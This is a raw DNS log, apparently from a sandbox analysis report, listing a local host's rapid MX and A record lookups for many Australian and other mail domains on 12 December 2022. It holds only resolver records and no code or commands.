                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.535927057 CET8.8.8.8192.168.2.30x62beNo error (0)airnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.580559015 CET8.8.8.8192.168.2.30x20e2No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.581876993 CET8.8.8.8192.168.2.30x3aaaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.581876993 CET8.8.8.8192.168.2.30x3aaaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.581876993 CET8.8.8.8192.168.2.30x3aaaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.600307941 CET8.8.8.8192.168.2.30xdff1No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.670574903 CET8.8.8.8192.168.2.30x10b8No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.697694063 CET8.8.8.8192.168.2.30xbb25No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.757302999 CET8.8.8.8192.168.2.30x2aa9No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.778847933 CET8.8.8.8192.168.2.30xc069No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.842062950 CET8.8.8.8192.168.2.30xb83dNo error (0)ab.auone-net.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.007443905 CET8.8.8.8192.168.2.30xb17cNo error (0)phed.auth.grMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.007443905 CET8.8.8.8192.168.2.30xb17cNo error (0)phed.auth.grMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.070811033 CET8.8.8.8192.168.2.30xf220No error (0)mailsrv1.ccf.auth.gr155.207.1.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.075392008 CET8.8.8.8192.168.2.30xb744No error (0)transmin.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.100537062 CET8.8.8.8192.168.2.30xd53fNo error (0)mx01.auone-net.jp27.86.106.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.108272076 CET8.8.8.8192.168.2.30x692No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.113060951 CET8.8.8.8192.168.2.30x6a2eNo error (0)transmin-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.113060951 CET8.8.8.8192.168.2.30x6a2eNo error (0)transmin-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.132671118 CET8.8.8.8192.168.2.30x8a9No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.227767944 CET8.8.8.8192.168.2.30xc440No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.227767944 CET8.8.8.8192.168.2.30xc440No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.227767944 CET8.8.8.8192.168.2.30xc440No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.251456022 CET8.8.8.8192.168.2.30x7b5bNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.376163960 CET8.8.8.8192.168.2.30x8eeaNo error (0)flightcentre.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.376163960 CET8.8.8.8192.168.2.30x8eeaNo error (0)flightcentre.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.411302090 CET8.8.8.8192.168.2.30x30abNo error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.411302090 CET8.8.8.8192.168.2.30x30abNo error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.411302090 CET8.8.8.8192.168.2.30x30abNo error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.411302090 CET8.8.8.8192.168.2.30x30abNo error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.602746010 CET8.8.8.8192.168.2.30x9d8bNo error (0)chivertonwines.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.616667986 CET8.8.8.8192.168.2.30xee61No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.635651112 CET8.8.8.8192.168.2.30x1841No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.644022942 CET8.8.8.8192.168.2.30x2ee6No error (0)chivertonwines-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.644022942 CET8.8.8.8192.168.2.30x2ee6No error (0)chivertonwines-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.698419094 CET8.8.8.8192.168.2.30x5337No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.698419094 CET8.8.8.8192.168.2.30x5337No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.698419094 CET8.8.8.8192.168.2.30x5337No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.706845045 CET8.8.8.8192.168.2.30xa826No error (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.722655058 CET8.8.8.8192.168.2.30x3e43No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.725712061 CET8.8.8.8192.168.2.30x64cfNo error (0)mail.optusnet.com.au211.29.132.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.840321064 CET8.8.8.8192.168.2.30xe816No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.859467030 CET8.8.8.8192.168.2.30x39caNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.918988943 CET8.8.8.8192.168.2.30x4905No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.918988943 CET8.8.8.8192.168.2.30x4905No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.918988943 CET8.8.8.8192.168.2.30x4905No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.957475901 CET8.8.8.8192.168.2.30xc9beNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.051992893 CET8.8.8.8192.168.2.30xba4dName error (3)wangaratta-high.vic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.106419086 CET8.8.8.8192.168.2.30xb785No error (0)ehtravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.106419086 CET8.8.8.8192.168.2.30xb785No error (0)ehtravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.140146017 CET8.8.8.8192.168.2.30xce76No error (0)d501078.b.ess.au.barracudanetworks.com3.24.133.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.140146017 CET8.8.8.8192.168.2.30xce76No error (0)d501078.b.ess.au.barracudanetworks.com3.24.133.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.140146017 CET8.8.8.8192.168.2.30xce76No error (0)d501078.b.ess.au.barracudanetworks.com3.24.133.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.406714916 CET8.8.8.8192.168.2.30x80fNo error (0)mst.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.406714916 CET8.8.8.8192.168.2.30x80fNo error (0)mst.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.428663015 CET8.8.8.8192.168.2.30x9d75No error (0)mx1-us1.ppe-hosted.com67.231.154.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.428663015 CET8.8.8.8192.168.2.30x9d75No error (0)mx1-us1.ppe-hosted.com148.163.129.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.431886911 CET8.8.8.8192.168.2.30x23adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.431886911 CET8.8.8.8192.168.2.30x23adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.431886911 CET8.8.8.8192.168.2.30x23adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.455543041 CET8.8.8.8192.168.2.30xff1aNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.487133026 CET8.8.8.8192.168.2.30xae21No error (0)hotkey.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.487133026 CET8.8.8.8192.168.2.30xae21No error (0)hotkey.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.528126955 CET8.8.8.8192.168.2.30x3baNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.528126955 CET8.8.8.8192.168.2.30x3baNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.528855085 CET8.8.8.8192.168.2.30xb3aaNo error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.552617073 CET8.8.8.8192.168.2.30xb068No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.592123032 CET8.8.8.8192.168.2.30xfd1cNo error (0)lizzy.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.592123032 CET8.8.8.8192.168.2.30xfd1cNo error (0)lizzy.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.623683929 CET8.8.8.8192.168.2.30xcc77No error (0)suncorp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.623683929 CET8.8.8.8192.168.2.30xcc77No error (0)suncorp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.644093037 CET8.8.8.8192.168.2.30xaf54No error (0)cluster9a.us.messagelabs.com52.207.128.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.740345001 CET8.8.8.8192.168.2.30x2ce1No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.764718056 CET8.8.8.8192.168.2.30xa8cfNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.764718056 CET8.8.8.8192.168.2.30xa8cfNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.831929922 CET8.8.8.8192.168.2.30x691bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.831929922 CET8.8.8.8192.168.2.30x691bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.831929922 CET8.8.8.8192.168.2.30x691bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.851962090 CET8.8.8.8192.168.2.30x562eNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.914550066 CET8.8.8.8192.168.2.30x471aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.914550066 CET8.8.8.8192.168.2.30x471aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.914550066 CET8.8.8.8192.168.2.30x471aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.936599016 CET8.8.8.8192.168.2.30xffedNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.944475889 CET8.8.8.8192.168.2.30xd25aNo error (0)mx.ozonline.com.au203.4.248.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.990781069 CET8.8.8.8192.168.2.30xead6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.990781069 CET8.8.8.8192.168.2.30xead6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.990781069 CET8.8.8.8192.168.2.30xead6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.010433912 CET8.8.8.8192.168.2.30x40cdNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.092191935 CET8.8.8.8192.168.2.30xd50dNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.092191935 CET8.8.8.8192.168.2.30xd50dNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.113831043 CET8.8.8.8192.168.2.30xaea3No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.184546947 CET8.8.8.8192.168.2.30xdf1dName error (3)bsharpaccounts.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.206537008 CET8.8.8.8192.168.2.30xdf1dName error (3)bsharpaccounts.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.304928064 CET8.8.8.8192.168.2.30x1bd9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.304928064 CET8.8.8.8192.168.2.30x1bd9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.304928064 CET8.8.8.8192.168.2.30x1bd9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
